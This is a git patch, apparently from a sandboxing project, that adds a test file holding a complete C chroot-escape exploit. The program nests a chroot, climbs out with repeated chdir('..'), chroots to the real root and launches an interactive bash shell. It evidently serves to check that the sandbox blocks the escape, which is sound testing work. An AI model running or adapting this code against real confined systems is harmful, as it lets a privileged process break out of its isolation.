From 80cc5fa809ebb3f213852312dea15cded00cc069 Mon Sep 17 00:00:00 2001
From: netblue30 <netblue30@yahoo.com>
Date: Sun, 20 Nov 2016 16:05:45 -0500
Subject: chroot testing

---
 test/chroot/unchroot.c | 40 ++++++++++++++++++++++++++++++++++++++++
 1 file changed, 40 insertions(+)
 create mode 100644 test/chroot/unchroot.c

(limited to 'test/chroot/unchroot.c')

diff --git a/test/chroot/unchroot.c b/test/chroot/unchroot.c
new file mode 100644
index 000000000..1982e07f3
--- /dev/null
+++ b/test/chroot/unchroot.c
@@ -0,0 +1,40 @@
+// simple unchroot example from http://linux-vserver.org/Secure_chroot_Barrier
+#include <unistd.h>
+#include <stdlib.h>
+#include <stdio.h>
+#include <sys/types.h>
+#include <sys/stat.h>
+
+void die(char *msg) {
+	perror(msg);
+	exit(1);
+}
+
+int main(int argc, char *argv[])
+{
+	int i;
+	
+	if (chdir("/") != 0)
+		die("chdir(/)");
+	
+	if (mkdir("baz", 0777) != 0)
+		; //die("mkdir(baz)");
+	
+	if (chroot("baz") != 0)
+		die("chroot(baz)");
+	
+	for (i=0; i<50; i++) {
+		if (chdir("..") != 0)
+			die("chdir(..)");
+	}
+	
+	if (chroot(".") != 0)
+		die("chroot(.)");
+	
+	printf("Exploit seems to work. =)\n");
+	
+	execl("/bin/bash", "bash", "-i", (char *)0);
+	die("exec bash");
+	
+	exit(0);
+}
-- 
cgit v1.2.3-54-g00ecf